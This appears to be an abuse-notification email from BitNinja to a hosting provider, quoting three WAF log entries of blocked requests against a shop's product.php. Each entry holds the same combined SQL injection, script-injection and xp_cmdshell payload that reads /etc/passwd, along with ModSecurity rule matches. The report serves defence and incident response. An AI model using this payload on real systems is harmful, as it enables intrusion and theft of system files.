Dear Provider, I’m George Egri, the Co-Founder and CEO of BitNinja Server Security. I’m writing to inform you that we have detected malicious requests from the IP 94.130.65.52 directed at our clients’ servers. As a result of these attacks, we have added your IP to our greylist to prevent it from attacking our clients’ servers. Servers are increasingly exposed as the targets of botnet attacks and you might not be aware that your server is being used as a “bot” to send malicious attacks over the Internet. I’ve collected the 3 earliest logs below, and you can find the freshest 100, that may help you disinfect your server, under the link. http://bitninja.io/incidentReport.php?details=7c55c38e31d31dd65f?utm_source=incident&utm_content=publicpage. The timezone is UTC +1:00.
Url: [rspglobal.ca/product.php] Headers: [array ( 'BN-Client-Port' => '59737', 'BN-Frontend' => 'waf-https', 'accept-encoding' => 'gzip, br, deflate', 'host' => 'rspglobal.ca', 'BN-TP-Proto' => 'https', 'BN-TP-Dstport' => '443', 'accept' => '*/*', 'BN-TP-Dstip' => '74.50.117.113', 'BN-TP-Clientip' => '94.130.65.52', 'user-agent' => 'Mozilla/5.0 (Windows NT 8_1_1; Win64; x64) WebKit/569.13.3 (KHTML, like Gecko) Safari/7.1.2', 'BN-X-Forwarded-Proto' => '', 'X-Forwarded-Proto' => 'https', 'BN-X-Forwarded-For' => '', 'X-Forwarded-For' => '94.130.65.52', 'BN-X-Forwarded-Port' => '', 'X-Forwarded-Port' => '443', )] Get: ['category_id=17%3C!AND%201=1%20UNION%20ALL%20SELECT%201,NULL,1,%27%3Cscript%3Ealert(%22666%22)%3C/script%3E%27,table_name%20FROM%20information_schema.tables%20WHERE%202%3E1--/**/;%20EXEC%20xp_cmdshell(%27cat%20../../../etc/passwd%27)%23'] Matched: [ ModSecurity id: [930120] revision [4] msg [OS File Access Attempt] match [Matched "Operator `PmFromFile' with parameter `lfi-os-files.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1,null,1,'<script>alert("666")</etc/passwd')#] severity [CRITICAL] ModSecurity id: [932160] revision [1] msg [Remote Command Execution: Unix Shell Code Found] match [Matched "Operator `PmFromFile' with parameter `unix-shell.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1 null 1 <script>alert(666)</etc/passwd)#] severity [CRITICAL] Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=5,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found ]
Url: [rspglobal.ca/product.php] Headers: [array ( 'BN-Client-Port' => '59737', 'BN-Frontend' => 'waf-https', 'accept-encoding' => 'gzip, br, deflate', 'host' => 'rspglobal.ca', 'BN-TP-Proto' => 'https', 'BN-TP-Dstport' => '443', 'accept' => '*/*', 'BN-TP-Dstip' => '74.50.117.113', 'BN-TP-Clientip' => '94.130.65.52', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1_1) WebKit/544.17.4 (KHTML, like Gecko) Safari/9.1.2', 'BN-X-Forwarded-Proto' => '', 'X-Forwarded-Proto' => 'https', 'BN-X-Forwarded-For' => '', 'X-Forwarded-For' => '94.130.65.52', 'BN-X-Forwarded-Port' => '', 'X-Forwarded-Port' => '443', )] Get: ['category_id=17%3C!AND%201=1%20UNION%20ALL%20SELECT%201,NULL,1,%27%3Cscript%3Ealert(%22666%22)%3C/script%3E%27,table_name%20FROM%20information_schema.tables%20WHERE%202%3E1--/**/;%20EXEC%20xp_cmdshell(%27cat%20../../../etc/passwd%27)%23'] Matched: [ ModSecurity id: [930120] revision [4] msg [OS File Access Attempt] match [Matched "Operator `PmFromFile' with parameter `lfi-os-files.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1,null,1,'<script>alert("666")</etc/passwd')#] severity [CRITICAL] ModSecurity id: [932160] revision [1] msg [Remote Command Execution: Unix Shell Code Found] match [Matched "Operator `PmFromFile' with parameter `unix-shell.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1 null 1 <script>alert(666)</etc/passwd)#] severity [CRITICAL] Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=5,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found ]
Url: [rspglobal.ca/product.php] Headers: [array ( 'BN-Client-Port' => '59737', 'BN-Frontend' => 'waf-https', 'accept-encoding' => 'gzip, br, deflate', 'host' => 'rspglobal.ca', 'BN-TP-Proto' => 'https', 'BN-TP-Dstport' => '443', 'accept' => '*/*', 'BN-TP-Dstip' => '74.50.117.113', 'BN-TP-Clientip' => '94.130.65.52', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 8.0.1; rv:35.41.1) Gecko/20100101 Firefox/35.41.1', 'BN-X-Forwarded-Proto' => '', 'X-Forwarded-Proto' => 'https', 'BN-X-Forwarded-For' => '', 'X-Forwarded-For' => '94.130.65.52', 'BN-X-Forwarded-Port' => '', 'X-Forwarded-Port' => '443', )] Get: ['category_id=17%3C!AND%201=1%20UNION%20ALL%20SELECT%201,NULL,1,%27%3Cscript%3Ealert(%22666%22)%3C/script%3E%27,table_name%20FROM%20information_schema.tables%20WHERE%202%3E1--/**/;%20EXEC%20xp_cmdshell(%27cat%20../../../etc/passwd%27)%23'] Matched: [ ModSecurity id: [930120] revision [4] msg [OS File Access Attempt] match [Matched "Operator `PmFromFile' with parameter `lfi-os-files.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1,null,1,'<script>alert("666")</etc/passwd')#] severity [CRITICAL] ModSecurity id: [932160] revision [1] msg [Remote Command Execution: Unix Shell Code Found] match [Matched "Operator `PmFromFile' with parameter `unix-shell.data' against variable `ARGS:category_id' (Value: `17<!AND 1=1 UNION ALL SELECT 1,NULL,1,'<script>alert("666")</script>',table_name FROM information_sc (73 characters omitted)' )] logdata [Matched Data: etc/passwd found within ARGS:category_id: 17<!and 1=1 union all select 1 null 1 <script>alert(666)</etc/passwd)#] severity [CRITICAL] Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=5,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found ]
Please keep in mind that after the first intrusion we log all traffic between your server and the BitNinja-protected servers until the IP is removed from the greylist. This means you may see valid logs beside the malicious actions in the link above. If you need help finding the malicious logs, please don’t hesitate to contact our incident experts by replying to this e-mail. For more information on analyzing and understanding outbound traffic, check out this: https://doc.bitninja.io/_images/bitninja-incident-report-1.jpg?utm_source=incident&utm_campaign=investigation&utm_content=image We’ve also dedicated an entire site help people prevent their server from sending malicious attacks: https://doc.bitninja.io/investigations.html?utm_source=incident&utm_campaign=investigation&utm_content=documentation Thank you for helping us make the Internet a safer place! Regards, George Egri CEO at BitNinja.io BitNinja.io @ BusinessInsider UK BitNinja.io hits the WHIR.com BitNinja @ CodeMash conference